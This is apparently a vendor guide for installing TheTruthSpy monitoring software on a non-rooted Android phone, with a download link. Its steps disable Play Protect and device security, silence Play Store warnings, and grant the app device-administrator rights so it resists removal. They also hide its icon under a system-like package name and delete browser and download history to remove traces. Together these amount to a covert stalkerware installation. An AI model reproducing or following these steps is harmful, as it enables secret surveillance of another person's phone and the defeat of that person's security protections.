Install Software on Non-Rooted Android
This guide is for installing on UN-rooted Android devices only.
- IM capture and some advanced features such as Intercept Call require a rooted phone to work. If you have a rooted Android, please see the guide for installing on a rooted device here.
- Before proceeding, check that you have a compatible OS version.
- You can find your OS version from the phone's Settings > About > Android Version page.
- Be sure you have any passwords necessary to access the phone after a restart.
- Minor steps below may differ between Android OS versions, phone models, and/or browsers being used.
Prerequisites
-
Disable Security Settings
From the Apps drawer, tap on Google Settings > Security. Then, under Verify Apps, turn off all options.
For Android OS 8 and above, go to Settings -> Google/Google Settings -> Security -> Google Play Protect/Play Protect settings and make sure Scan device for security threats is disabled.
-
Enable Unknown Sources
Go to Apps > Settings > Lock Screen & Security and make sure Unknown Sources is enabled.
For Android OS 8 and above, go to Settings, search for Install unknown apps, and tap on the browser you will use for download software. For example: if you are using Chrome for download, tap Chrome and enable Allow from this source.
-
(Samsung only, Android OS7 and above) Disable Device Security
Go to Settings -> Apps, tap three-dot icon on the top right, then tap Show system apps -> Device security -> Storage -> Clear data -> Delete/ OK
-
Disable Google Play Store Notifications
This is to avoid warnings that may otherwise randomly appear. Disabling Notifications does not disable Play Store or prevent normal app updates.
For OS 9 and above: Go to Settings > Notifications (click “see all”) > Google Play Store, and tap the slider to disable it. Next, tap on Google Play Store to open the menu and confirm Notifications are disabled.
For OS 8 and below: Go to Settings > Apps & Notifications > Notifications (scroll down to Google Play Store), and tap the slider, so it reads “Off.”
Important Note
Some devices may have slightly different navigation to the Notifications menu.
Installing the software (unrooted version)
-
Download the Application
Open up your phone internet browser and navigate to the website
Notes: here is an alternative link for downloading: https://d.thetruthspy.com.
-
Software Installation
Tap Install. Once the installation has been completed, tap Open when the option appears.
Important Note
If you cannot tap Open and can only tap Done, the software is already installed. If you are reinstalling the software, you must first uninstall the previous version.
To uninstall the previous version, go to Settings > Application Manager > com.android.system.service or sync services (for software version 4.0.3 and above) and tap Uninstall. We recommend restarting the phone after uninstalling it. You may then start a new installation.
-
Accept Installation Terms
Tick I accept the license agreement and then tap Continue
-
SIM Card Support
If a SIM card is not already inserted, Phones running Android OS 4.x may see a message to Insert Sim Card. For dual SIM phone models, only a single SIM card can be fully supported. If you see this screen, please turn the phone off to insert a SIM card and then restart from the beginning.
-
Activate Device Administrator
For non-rooted Android devices that cannot have root permissions granted to the application, activate Device Administrator. This grants the software additional local permissions making it more secure and less likely to be uninstalled. Tap Activate to continue.
-
Battery Optimization
Tap on “Allow” to let the software continuously run in the background without being terminated.
-
Activation Code & Visibility
Enter your license code and tap Activate. Please wait as the software activates. You will then be asked to set your software visible or invisible. Tap Yes to hide the software icon or tab No to keep it visible in the App Drawer.
Congratulations! You have now completed the software installation. However, to remove traces of the installation, please follow the steps below.
-
Clear Browser
In the phone browser you used in Step 1, you can delete the browser URL history. Tap the browser menu button and then tap Settings > Privacy > Delete Personal Data. Ensure the options for Browser History, Cache, and Cookies, and Site Data are selected, then tap Delete.
Important Note
Steps may vary depending on the browser being used.
-
Clear Download History
To delete the downloaded file, press the Home button to return to the app list and choose the My Files browser. Tap Download History/ Downloads. Select the downloaded file, then tap the Trash icon to delete the installation file from the phone. Tap Delete to confirm.
